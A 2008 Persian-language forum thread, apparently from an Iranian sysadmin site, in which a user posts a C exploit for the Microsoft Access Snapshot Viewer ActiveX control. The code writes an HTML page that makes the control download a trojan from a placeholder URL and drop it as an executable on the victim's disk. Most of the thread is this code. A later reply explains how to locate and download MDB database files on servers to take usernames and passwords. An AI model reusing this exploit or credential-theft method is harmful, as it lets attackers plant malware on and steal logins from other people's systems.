باگ خطرناک در ACCESS

Alux · 2008-07-28, 07:23 PM

یه باگ خطرناک امروز دیدم واسه اکسل اومده

که با کابر اجازه می ده یه تروجان در سرور آپلود کنه

باگ بصورت ریموت هست

اینم کد

Code:

/* Microsoft Access Snapshot Viewer ActiveX Control Exploit
   Ms-Access SnapShot Exploit Snapview.ocx v 10.0.5529.0
   Download nice binaries into an arbitrary box
   Vulnerability discovered by Oliver Lavery 
   http://www.securityfocus.com/bid/8536/info
   Remote: Yes
   greetz to str0ke */

#include <stdio.h>
#include <stdlib.h>


#define Filename        "Ms-Access-SnapShot.html"


FILE *File;
char data[] = "<html>\n<objectclassid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9'id='attack'></object>\n"
              "<script language='javascript'>\nvar arbitrary_file = 'http://path_to_trojan'\n"
              "var dest = 'C:/Docume~1/ALLUSE~1/trojan.exe'\nattack.SnapshotPath = arbitrary_file\n"
              "attack.CompressedPath = destination\nattack.PrintSnapshot(arbitrary_file,destination)\n"
              "<script>\n<html>";

int main ()
{
        printf("**Microsoft Access Snapshot Viewer ActiveX Exploit**\n");
        printf("**c0ded by callAX**\n");
        printf("**r00t your enemy .| **");

        char *b0fer;

        if ( (File = fopen(Filename,"w")) == NULL ) {
                printf("\n fopen() error");
                exit(1);
        }

        b0fer = (char*)malloc(strlen(data));

        fwrite(data, strlen(data), 1,File);
        fclose(File);

        printf("\n\n" Filename " has been created.\n");
        return 0;
}

webgard3 · 2008-07-29, 07:59 PM

یعنی آپلود کنه روی سروری که روش اکسل نصبه؟

Alux · 2008-07-29, 08:28 PM

آره ، خوراک NTTAC

herus_deus · 2008-07-29, 11:07 PM

البته اكسس منظوره نظر بوده.

Alux · 2008-07-30, 07:07 PM

اشتباه لپی بود !!!

shast · 2008-07-31, 03:56 PM

access باگ زیاد داده ... الان شما اگه یک سروری که دیتابسش از اکسس باشه کار براش از اکسس استفاده کنن ( که نیست دیگه خیلی قدیمیه ) شما با یه برنامه ای مثل Intellitamper می تونین فایل MDB رو پیدا کنین و دل کنین که یوزر پس توش هستش .. مثلا پورتال های News دوسال پیش یادامه خیلی اینجوری هک می شدن ..... اینم باگ جالبی بود ممنونم از دوسته خوبمون آقا علی رضا بابت اطلاع رسانیه عالی

2008-07-29, 07:59 PM	#2 (permalink)
webgard3 (شاهین غرقی) Registered User Join Date: Feb 2006 Location: iran/shiraz نوشته ها: 3,442 Thanks: 135 Thanked 671 Times in 415 Posts Groans: 6 Groaned at 13 Times in 12 Posts	یعنی آپلود کنه روی سروری که روش اکسل نصبه؟ __________________ Shahin Gharghi www.PersianAdmins.com Shahin@Admins.ir

2008-07-29, 08:28 PM	#3 (permalink)
Alux (Alireza HBB) Registered User Join Date: Jan 2006 Location: Tehran نوشته ها: 1,526 Thanks: 343 Thanked 232 Times in 143 Posts Groans: 37 Groaned at 17 Times in 11 Posts	آره ، خوراک NTTAC __________________ Alux @ Dci . IR A.Habibi@Datak-Telecom.net

2008-07-29, 11:07 PM	#4 (permalink)
herus_deus (مهدي) Registered User Join Date: May 2004 نوشته ها: 904 Thanks: 107 Thanked 133 Times in 84 Posts Groans: 3 Groaned at 0 Times in 0 Posts	البته اكسس منظوره نظر بوده. __________________ مردم زيادند و پر توقع و خدا يكي است و سريع الرضا،پس تو او را راضي كن،ديگران چيزي نيستند.

2008-07-30, 07:07 PM	#5 (permalink)
Alux (Alireza HBB) Registered User Join Date: Jan 2006 Location: Tehran نوشته ها: 1,526 Thanks: 343 Thanked 232 Times in 143 Posts Groans: 37 Groaned at 17 Times in 11 Posts	اشتباه لپی بود !!! __________________ Alux @ Dci . IR A.Habibi@Datak-Telecom.net

امکانات بيشتر	جستجو در اين بحث
Show Printable Version Email this Page	جستجو در اين بحث: جستجوی پیشرفته
نحوه نمايش	Rate This Thread
Linear Mode Switch to Hybrid Mode Switch to Threaded Mode	Rate This Thread:

2008-07-31, 03:56 PM	#6 (permalink)
shast (ali) Registered User Join Date: Nov 2007 نوشته ها: 92 Thanks: 20 Thanked 9 Times in 8 Posts Groans: 4 Groaned at 1 Time in 1 Post	access باگ زیاد داده ... الان شما اگه یک سروری که دیتابسش از اکسس باشه کار براش از اکسس استفاده کنن ( که نیست دیگه خیلی قدیمیه ) شما با یه برنامه ای مثل Intellitamper می تونین فایل MDB رو پیدا کنین و دل کنین که یوزر پس توش هستش .. مثلا پورتال های News دوسال پیش یادامه خیلی اینجوری هک می شدن ..... اینم باگ جالبی بود ممنونم از دوسته خوبمون آقا علی رضا بابت اطلاع رسانیه عالی

مطالب مشابه
مطلب	آغازگر	انجمن	پاسخ	آخرین نوشته
Securing the ISA Server Configuration	ben611b	Microsoft ISA Server -ا-	9	2008-05-07 01:40 PM
معرفی پروتکل RADIUS	top7news	مباحث عمومی شبکه -ا-	5	2007-11-24 11:53 AM
تنظيمات access list ها و امنيت در شبکه	ccna	Cisco Systems -ا-	2	2007-09-04 07:44 PM